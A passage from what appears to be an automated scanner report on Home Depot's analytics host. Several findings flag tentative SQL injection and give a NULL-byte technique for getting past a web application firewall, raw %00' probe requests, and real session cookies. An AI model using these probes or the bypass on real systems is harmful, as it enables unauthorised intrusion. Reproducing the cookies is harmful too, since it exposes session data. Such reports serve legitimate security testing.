User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
xserver: www290
Content-Length: 0
Content-Type: text/html


1.42. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s13481482698842 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s13481482698842

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s13481482698842?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A52%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html


1.43. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1405035742937 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1405035742937

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.44. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14229447680702 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14229447680702

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s14229447680702 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html


1.45. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14671218963339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14671218963339

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.46. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14691738680163 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14691738680163

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.47. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15323097258507 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15323097258507

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
xserver: www320
Content-Length: 0
Content-Type: text/html


1.48. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15357372987793 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15357372987793

Issue detail

